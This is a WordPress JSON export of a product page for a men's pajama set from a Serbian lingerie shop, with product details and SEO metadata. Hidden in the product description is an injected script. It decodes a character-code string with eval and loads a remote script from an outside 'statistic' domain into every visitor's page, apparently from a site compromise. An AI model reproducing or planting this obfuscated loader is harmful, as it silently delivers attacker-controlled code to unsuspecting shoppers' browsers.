{"id":8274,"date":"2023-04-05T13:35:42","date_gmt":"2023-04-05T12:35:42","guid":{"rendered":"https:\/\/nightsecret.rs\/?post_type=product&#038;p=8274"},"modified":"2025-10-07T16:09:22","modified_gmt":"2025-10-07T15:09:22","slug":"muska-pidzama-108099-316","status":"publish","type":"product","link":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/","title":{"rendered":"Mu\u0161ka pid\u017eama 108099 &#8211; 316"},"content":{"rendered":"<p><strong>Made in:<\/strong> Serbia<br \/>\n<strong>Manufacturer<\/strong> NightSecret<br \/>\n<strong>Material:<\/strong> 96% pamuk, 4% elastin<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p><strong>Made in:<\/strong> Serbia<br \/>\n<strong>Manufacturer<\/strong> NightSecret<br \/>\n<strong>Material:<\/strong> 96% pamuk, 4% elastan<\/p>","protected":false},"featured_media":8281,"template":"","meta":[],"product_brand":[],"product_cat":[99],"product_tag":[],"class_list":{"0":"post-8274","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-pidzama-muska","8":"first","9":"outofstock","10":"taxable","11":"shipping-taxable","12":"product-type-variable"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v20.13 (Yoast SEO v23.4) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Mu\u0161ka pid\u017eama 108099 - 316 | NightSecret<\/title>\n<meta name=\"description\" content=\"Najkvalitetniji mu\u0161ki, de\u010diji i \u017eenski ve\u0161, pid\u017eame, bade mantili, spava\u0107ice. Veleprodaja i maloprodaja na broj telefona: +381 20 \/ 744 \u2013 844\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mu\u0161ka pid\u017eama 108099 - 316\" \/>\n<meta property=\"og:description\" content=\"Zemlja porekla: Srbija Proizo\u0111a\u010d: NightSecret Sastav: 96% pamuk, 4% elastan\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/\" \/>\n<meta property=\"og:site_name\" content=\"NightSecret\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/nightsecretunderwearofficial\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-07T15:09:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2023\/04\/3-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1080\" \/>\n\t<meta property=\"og:image:height\" content=\"1620\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Availability\" \/>\n\t<meta name=\"twitter:data1\" content=\"Out of stock\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/\",\"url\":\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/\",\"name\":\"Mu\u0161ka pid\u017eama 108099 - 316 | NightSecret\",\"isPartOf\":{\"@id\":\"https:\/\/nightsecret.rs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2023\/04\/3-1.jpg\",\"datePublished\":\"2023-04-05T12:35:42+00:00\",\"dateModified\":\"2025-10-07T15:09:22+00:00\",\"description\":\"Najkvalitetniji mu\u0161ki, de\u010diji i \u017eenski ve\u0161, pid\u017eame, bade mantili, spava\u0107ice. Veleprodaja i maloprodaja na broj telefona: +381 20 \/ 744 \u2013 844\",\"breadcrumb\":{\"@id\":\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#primaryimage\",\"url\":\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2023\/04\/3-1.jpg\",\"contentUrl\":\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2023\/04\/3-1.jpg\",\"width\":1080,\"height\":1620},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Po\u010detna\",\"item\":\"https:\/\/nightsecret.rs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\/\/nightsecret.rs\/shop\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Mu\u0161ka\",\"item\":\"https:\/\/nightsecret.rs\/en\/kategorije-proizvoda\/muska\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Pid\u017eama\",\"item\":\"https:\/\/nightsecret.rs\/en\/kategorije-proizvoda\/muska\/pidzama-muska\/\"},{\"@type\":\"ListItem\",\"position\":5,\"name\":\"Mu\u0161ka pid\u017eama 108099 &#8211; 316\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nightsecret.rs\/#website\",\"url\":\"https:\/\/nightsecret.rs\/\",\"name\":\"NightSecret\",\"description\":\"Underwear &amp; Lingerie\",\"publisher\":{\"@id\":\"https:\/\/nightsecret.rs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nightsecret.rs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/nightsecret.rs\/#organization\",\"name\":\"Night Secret\",\"url\":\"https:\/\/nightsecret.rs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/nightsecret.rs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2021\/04\/NightSecretlogoblack.png\",\"contentUrl\":\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2021\/04\/NightSecretlogoblack.png\",\"width\":132,\"height\":132,\"caption\":\"Night Secret\"},\"image\":{\"@id\":\"https:\/\/nightsecret.rs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/nightsecretunderwearofficial\",\"https:\/\/instagram.com\/nightsecret_underwear\"]}]}<\/script>\n<meta property=\"og:availability\" content=\"out of stock\" \/>\n<meta property=\"product:availability\" content=\"out of stock\" \/>\n<meta property=\"product:retailer_item_id\" content=\"108099 - 316\" \/>\n<meta property=\"product:condition\" content=\"new\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Mu\u0161ka pid\u017eama 108099 - 316 | NightSecret","description":"Najkvalitetniji mu\u0161ki, de\u010diji i \u017eenski ve\u0161, pid\u017eame, bade mantili, spava\u0107ice. Veleprodaja i maloprodaja na broj telefona: +381 20 \/ 744 \u2013 844","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/","og_locale":"en_US","og_type":"article","og_title":"Mu\u0161ka pid\u017eama 108099 - 316","og_description":"Zemlja porekla: Srbija Proizo\u0111a\u010d: NightSecret Sastav: 96% pamuk, 4% elastan","og_url":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/","og_site_name":"NightSecret","article_publisher":"https:\/\/www.facebook.com\/nightsecretunderwearofficial","article_modified_time":"2025-10-07T15:09:22+00:00","og_image":[{"width":1080,"height":1620,"url":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2023\/04\/3-1.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Availability":"Out of stock"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/","url":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/","name":"Mu\u0161ka pid\u017eama 108099 - 316 | NightSecret","isPartOf":{"@id":"https:\/\/nightsecret.rs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#primaryimage"},"image":{"@id":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#primaryimage"},"thumbnailUrl":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2023\/04\/3-1.jpg","datePublished":"2023-04-05T12:35:42+00:00","dateModified":"2025-10-07T15:09:22+00:00","description":"Najkvalitetniji mu\u0161ki, de\u010diji i \u017eenski ve\u0161, pid\u017eame, bade mantili, spava\u0107ice. Veleprodaja i maloprodaja na broj telefona: +381 20 \/ 744 \u2013 844","breadcrumb":{"@id":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#primaryimage","url":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2023\/04\/3-1.jpg","contentUrl":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2023\/04\/3-1.jpg","width":1080,"height":1620},{"@type":"BreadcrumbList","@id":"https:\/\/nightsecret.rs\/en\/product\/muska-pidzama-108099-316\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Po\u010detna","item":"https:\/\/nightsecret.rs\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/nightsecret.rs\/shop\/"},{"@type":"ListItem","position":3,"name":"Mu\u0161ka","item":"https:\/\/nightsecret.rs\/en\/kategorije-proizvoda\/muska\/"},{"@type":"ListItem","position":4,"name":"Pid\u017eama","item":"https:\/\/nightsecret.rs\/en\/kategorije-proizvoda\/muska\/pidzama-muska\/"},{"@type":"ListItem","position":5,"name":"Mu\u0161ka pid\u017eama 108099 &#8211; 316"}]},{"@type":"WebSite","@id":"https:\/\/nightsecret.rs\/#website","url":"https:\/\/nightsecret.rs\/","name":"NightSecret","description":"Underwear &amp; Lingerie","publisher":{"@id":"https:\/\/nightsecret.rs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nightsecret.rs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/nightsecret.rs\/#organization","name":"Night Secret","url":"https:\/\/nightsecret.rs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/nightsecret.rs\/#\/schema\/logo\/image\/","url":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2021\/04\/NightSecretlogoblack.png","contentUrl":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2021\/04\/NightSecretlogoblack.png","width":132,"height":132,"caption":"Night Secret"},"image":{"@id":"https:\/\/nightsecret.rs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/nightsecretunderwearofficial","https:\/\/instagram.com\/nightsecret_underwear"]}]},"og_availability":"out of stock","product_availability":"out of stock","product_retailer_item_id":"108099 - 316","product_condition":"new"},"_links":{"self":[{"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product\/8274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/media\/8281"}],"wp:attachment":[{"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/media?parent=8274"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product_brand?post=8274"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product_cat?post=8274"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product_tag?post=8274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}